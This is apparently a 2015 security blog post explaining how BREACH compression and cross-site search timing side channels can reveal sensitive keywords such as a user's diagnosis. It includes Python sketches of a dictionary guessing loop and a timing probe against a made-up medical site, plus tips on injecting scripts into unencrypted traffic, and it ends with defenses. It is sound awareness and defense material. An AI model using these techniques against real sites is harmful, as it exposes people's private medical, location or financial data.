Wednesday, December 23, 2015

I challenge you to compute this: Specializing BREACH and Cross-Site Search attacks to steal private keywords

In the real world there are many cases where we are more interested in how well a system protects a few specific keywords than in how well it can secure data “in a broader sense”. If an attacker can learn those keywords (say, a medical diagnosis), then the system’s security has failed from the user’s perspective.

In this article I will try to raise awareness of two side channel attacks that are often practical for stealing such strings. Specifically, I want to emphasize how these two known attacks can be used against websites to exfiltrate private information about a user by matching the protected data against a set of sensitive strings, such as a domain-specific dictionary.

The question that I want you to keep in the back of your mind when reading this article is: As an engineer, what kind of data am I actually protecting? Is it a sensitive set of words from a small corpus, and how do I deal with the fact that the data is “low entropy”?

As an attacker, can I learn something sensitive without decrypting your TLS channel, circumventing the same-origin policy, or taking over your account? Everyone likes to steal session tokens, but do I really have to in order to get at the user data? Can’t I just throw my sensitive keyword at the target and see if it sticks?

A Contrived Example To Get Started: Payload length

Say that your doctor’s office launches a website, https://getmydiagnosis.foo (to the horror of the security and privacy community). After logging in, you are presented with a /diagnosis endpoint which, this being an early beta, will print one of the following two strings to the user:

“You are healthy!”
“You have cancer! Here’s some information about that…”

What do I do as an attacker sniffing your connection? I look at the TLS length fields or TCP packet lengths. The data is very well encrypted, but because the encrypted content is one of only two options, I can use side information (the packet lengths) to figure out which one it is. I have learned the plaintext without decrypting anything.
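As a minimal sketch of why length alone is enough here (the fixed per-record overhead below is a made-up stand-in, not a real TLS constant), an eavesdropper only needs to compare the observed size against the two candidates:

# Minimal sketch: the two possible plaintexts differ in length, and TLS is
# roughly length-preserving, so the record size alone identifies the message.
HEALTHY = "You are healthy!"
CANCER = "You have cancer! Here's some information about that..."

def guess_diagnosis(observed_record_length: int, overhead: int = 29) -> str:
    """Pick the candidate whose expected on-the-wire length is closest to what
    was observed. `overhead` stands in for the roughly constant per-record cost
    (header, MAC, padding); its exact value does not matter for the comparison."""
    candidates = {m: len(m) + overhead for m in (HEALTHY, CANCER)}
    return min(candidates, key=lambda m: abs(candidates[m] - observed_record_length))

print(guess_diagnosis(len(CANCER) + 29))   # prints the cancer message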

The important point in this silly example is as follows: what we really want to protect here is the keywords “healthy” and “cancer” (or even just the binary predicate of the presence of one of those). The description text is often not really important at all from a privacy perspective.

About BREACH: A compression side channel

Let us take a less contrived example. Go to any popular website and look at the HTTP traffic. You are likely to find that the payload, be it HTML or JSON or XML, is compressed.

Content-Encoding: gzip

The whole idea of compression is to make the output data “shorter” in a sense. The string "hello world, the world says hello!" will intuitively compress better than a string of random characters, because of the re-use of the substrings “hello” and “world”. If I as an attacker can inject a string that will be reflected in a payload that is then compressed, then I can exfiltrate some private data by trial, error and observation.
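As a quick illustration (using Python’s zlib as a stand-in for whatever compressor the server uses), text with repeated substrings shrinks, while random data of the same length does not:

import os
import zlib

redundant = b"hello world, the world says hello! " * 20   # lots of repeated substrings
random_data = os.urandom(len(redundant))                   # same length, no structure

print(len(redundant), len(zlib.compress(redundant)))       # compresses to a small fraction
print(len(random_data), len(zlib.compress(random_data)))   # stays about the same size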

Let us look at the doctor example again. This time the website is out of beta and is capable of listing all possible health issues, not just two options. Once logged in you are taken to the following page that unfortunately tells you that you have cancer and that you should contact your doctor's office for more information.

https://getmydiagnosis.foo/diagnosis?office=Stockholm
.. Cancer .. Stockholm


The payload is compressed and sent over TLS. For the sake of this example the query parameter “office” is reflected in the payload, whereas the rest of the data is not (say it’s pulled from a database). If I can make the target I’m attacking visit the specially crafted page:

https://getmydiagnosis.foo/diagnosis?office=Cancer
.. Cancer .. Cancer


Then the payload will compress slightly better when the injected guess matches the diagnosis (the static content) than when the guess does not appear in the static content at all. Armed with a dictionary of diseases, I want to force the target to visit all these pages and record how well the data compresses, by looking at packet lengths:

https://getmydiagnosis.foo/diagnosis?office=Flu
.. Cancer .. Flu
https://getmydiagnosis.foo/diagnosis?office=Mononucleosis
.. Cancer .. Mononucleosis
https://getmydiagnosis.foo/diagnosis?office=Cancer
.. Cancer .. Cancer


Doing this, I can maybe learn your diagnosis.
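To make the mechanics concrete, here is a hedged sketch of the dictionary loop. The server is simulated locally with zlib and a made-up HTML payload; in a real attack the observed_length step would instead be “force the victim’s browser to load the URL and record the encrypted payload size on the wire”. Comparing each guess against a same-length control (the guess reversed) is one way to cancel out the fact that the dictionary words have different lengths:

import zlib

SECRET_DIAGNOSIS = "Cancer"   # what the attacker wants to learn

def simulated_response(reflected: str) -> bytes:
    """Stand-in for the server: secret data plus the reflected, attacker-chosen
    query parameter, compressed the way Content-Encoding: gzip would compress it."""
    body = ("<html><body><h1>Your diagnosis</h1>"
            f"<p>Diagnosis: {SECRET_DIAGNOSIS}</p>"
            f"<p>Office: {reflected}</p>"
            "<p>Please contact your doctor's office for more information.</p>"
            "</body></html>")
    return zlib.compress(body.encode())

def observed_length(reflected: str) -> int:
    # In a real attack: make the victim load
    # https://getmydiagnosis.foo/diagnosis?office=<reflected>
    # and record the size of the encrypted response; here we just compress locally.
    return len(simulated_response(reflected))

dictionary = ["Flu", "Mononucleosis", "Diabetes", "Cancer", "Asthma"]

# A guess that also occurs in the secret part of the payload compresses away,
# so it comes out measurably shorter than its same-length reversed control.
scores = {g: observed_length(g[::-1]) - observed_length(g) for g in dictionary}
print(scores)
print("Most likely diagnosis:", max(scores, key=scores.get))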

How do I make the target visit those specially crafted pages? For one, if you can inject data into a WiFi network, just look for non-HTTPS traffic (the target may have many tabs open, for example) and inject something like

<script src="https://...">

This often works, especially if the website lacks CSRF protection. You can also trick the user into visiting a website of yours that does the same thing.

This class of attacks works better the less noisy the target endpoint is. JSON XHR endpoints that reflect input via a GET query parameter are often very nice to attack, as they are much less noisy than endpoints that embed the data in a large HTML payload.

Let's take a step back here and think about what the above attack means:

If I as an attacker have domain knowledge about what the plaintext can be, and that plaintext comes from a limited set of strings, I can quite easily (in some cases) learn your information without decrypting the TLS channel.

About Cross Site Search attacks: A timing side channel

A limitation of the BREACH attack is that it only works in practice if I can record packet lengths; that is how I learn whether the injected data compresses well or not.

A similar side channel attack that works in many cases is to make a cross-site request that instructs the browser to issue search queries on the target website, and to record the timing. The purpose is, of course, to find keywords for a user when the target website has a per-user search function. Queries for words that are in the search index will often return with different timings than queries for words that are not, depending on how the search result is constructed. This can be due to server-side processing, caching, database lookups done on the search results, etc.

As a concrete example, if I search in GMail for a random string, that will typically return in about 0.3 seconds. If however I search for a string that is in my index, it will take significantly longer (0.6 seconds or more) due to GMail fetching the individual results server side and constructing the response.

Quite often, a search function on a website is a non-mutating GET request, so it may not have CSRF protection.

Going back to the doctor website example, say that I can search my journal for medical history. Armed with the same dictionary as in the BREACH attack, I just construct a special website that asynchronously queries the endpoint below and records how long each request takes to complete.

https://getmydiagnosis.foo/searchmedicalhistory?query=...

I no longer need to be in the middle to learn interesting data; I just have to trick the target into visiting my attack website and record how long the “challenge” searches take compared to a known hit or miss. Often a fairly simple statistical model is enough to learn the search outcome, depending on how big a search space you are interested in.
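Here is a hedged sketch of that measurement against the search endpoint above (the dictionary words and the threshold are made up for illustration). In a real cross-site attack this logic runs as JavaScript on the attacker’s page in the victim’s browser, riding on the victim’s session cookies; the Python below only illustrates the timing and thresholding:

import statistics
import time
import urllib.request

SEARCH_URL = "https://getmydiagnosis.foo/searchmedicalhistory?query={}"
dictionary = ["cancer", "diabetes", "asthma", "mononucleosis"]

def timed_search(term: str, samples: int = 5) -> float:
    """Median wall-clock time for one search query, over a few samples."""
    timings = []
    for _ in range(samples):
        start = time.monotonic()
        try:
            urllib.request.urlopen(SEARCH_URL.format(term), timeout=10).read()
        except Exception:
            pass   # even an error response can carry a usable timing signal
        timings.append(time.monotonic() - start)
    return statistics.median(timings)

# Calibrate against a query that is almost certainly not in anyone's records.
baseline = timed_search("zzqqxx-not-a-real-word")

for word in dictionary:
    t = timed_search(word)
    hit = t > 1.5 * baseline   # crude threshold; a real attack wants a better model
    print(f"{word:15s} {t:.3f}s  {'likely indexed' if hit else 'probably not indexed'}")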

This attack can also be taken quite far if done correctly, even constructing whole keywords from parts. Amir Herzberg and Nethanel Gelernter [1] successfully used this timing attack against GMail to figure out the name of the account holder, using a divide-and-conquer search approach that is faster than trying names from a dictionary one by one. Their paper offers many super cool techniques for making this kind of attack very practical.

I won’t spoil the paper for you, but I want to mention one technique that I believe is awesome: by short-circuiting challenge search queries, you can often trick a search engine into performing some very time-consuming work when the first search keyword is not found. That will aid your data gathering.

The concern with XS-Search (cross-site search) is the same as with BREACH: relatively few queries are needed to learn whether a single keyword from a dictionary is present (more advanced searches may require more queries and a better model).

Sensitive Data Everywhere!

There are many places on the Internet where the content being protected is from a small set of strings, and those places can sometimes be attacked using these techniques, with a relatively small set of queries.

Before writing this article I, by cheating a little bit, used the compression attack against Google Location History. It reflects query parameters in the payload and it does contain the countries/places you have visited, which lends itself nicely to this kind of “dictionary” attack. Note that in practice this is difficult to do against Google Location History because the compressed payload is very noisy, so both I and the Google Security Team consider this attack against it to be more on the academic than the practical side. If Location History were less noisy, the attack might have worked in practice.

Of course, I am fairly certain that the general class of attack can be successfully mounted against other targets. Consider for example:
  • Medical data requires a small dictionary of diseases.
  • Search history requires a small dictionary of sensitive keywords that are interesting to the attacker.
  • Communication/chat data requires a small dictionary of common first/last names to enumerate contact information.
  • Location history data requires a small dictionary of the place names in the world (countries, cities etc).
  • Financial data requires a small dictionary of, for example, names (money transfer recipients), company names (stock investments), numbers (credit card numbers, salary data) etc.
  • … and others. A particularly scary case is when the information you are after is a simple predicate, or comes from a very small set of options.
If you can exploit search functionality, then that is typically a very viable approach as you don’t need to be in the middle of the TLS connection. If not, be the man in the middle and look for a compressed endpoint, with a normally small/clean output, where you can inject the challenge string you are looking for.

Protective Measures

Search fields can be enhanced with CSRF protection. There may be other places that are “search-like” and also leak timing information; it can be fun, and terrifying, to ask which other GET queries leak significant timing data.

BREACH can be avoided by not compressing sensitive output. Here the best bang for the buck is to disable compression on endpoints that reflect query parameters or (especially) have a small output size, because a small payload is typically less noisy and thus easier to attack than a large one.
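As a sketch of what that decision could look like in a response pipeline (the endpoint names and the size threshold are hypothetical, not a recommendation of exact values):

# Hypothetical helper for deciding when compression is safe enough to enable.
NEVER_COMPRESS = {"/diagnosis", "/searchmedicalhistory"}   # endpoints that echo input

def should_compress(path: str, reflects_request_data: bool, body: bytes,
                    min_size: int = 4096) -> bool:
    """Skip compression for endpoints that reflect attacker-controllable input,
    and for small payloads where a one-byte size difference is easy to spot."""
    if path in NEVER_COMPRESS or reflects_request_data:
        return False
    return len(body) >= min_size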

Rate limiting can sometimes help, if the search space is large enough that a significant number of queries is required to exhaust the dictionary. Of course, even strict rate limiting cannot protect content where the set of possibilities is very small.

A noisy output can help against BREACH by obscurity, by design, or by accident. A very ugly workaround that may increase the cost of the attack in some cases is to introduce a random byte string of random length into the payload. Since the string is random it will generally not compress, and because its length is also random, the compressed output gets a jittered length as well. This will often not work, though, for two reasons. First, the compression algorithm may break this band-aid in various ways: window sizes/lookback and compression contexts may make your random string not affect the compression of the interesting part. Second, it may still be possible to differentiate between a hit (which compresses) and a miss by doing enough requests.
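A sketch of that band-aid, with the caveats above (the padding range and the HTML-comment embedding are arbitrary choices for illustration):

import secrets
import zlib

def pad_then_compress(body: bytes) -> bytes:
    """Append a random-length chunk of random data (hidden in an HTML comment)
    before compressing. The filler is random, so it cannot be compressed away,
    and its random length jitters the compressed size. As noted above, this
    raises the attacker's cost (more samples are needed to average the jitter
    away) but does not remove the signal."""
    pad_len = secrets.randbelow(64)              # 0..63 random bytes of jitter
    pad = secrets.token_hex(pad_len).encode()    # hex-encoded so it stays HTML-safe
    return zlib.compress(body + b"<!-- " + pad + b" -->")

body = b"<p>Diagnosis: Cancer</p><p>Office: Stockholm</p>"
print(sorted({len(pad_then_compress(body)) for _ in range(10)}))   # sizes now vary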

Conclusion

Hopefully this article will raise awareness of these side channel attacks and how they can be of particular concern to systems that are meant to protect a small set of keywords.

In general, a useful question to ask when designing secure systems is this: What is the most important data I am protecting, and how large is the domain?

Thanks to my friends Gunnar Kreitz, Nenad Stojanovski and Alex Rad for valued feedback on this post. Any mistakes are solely my own.

[1] http://dl.acm.org/citation.cfm?id=2813688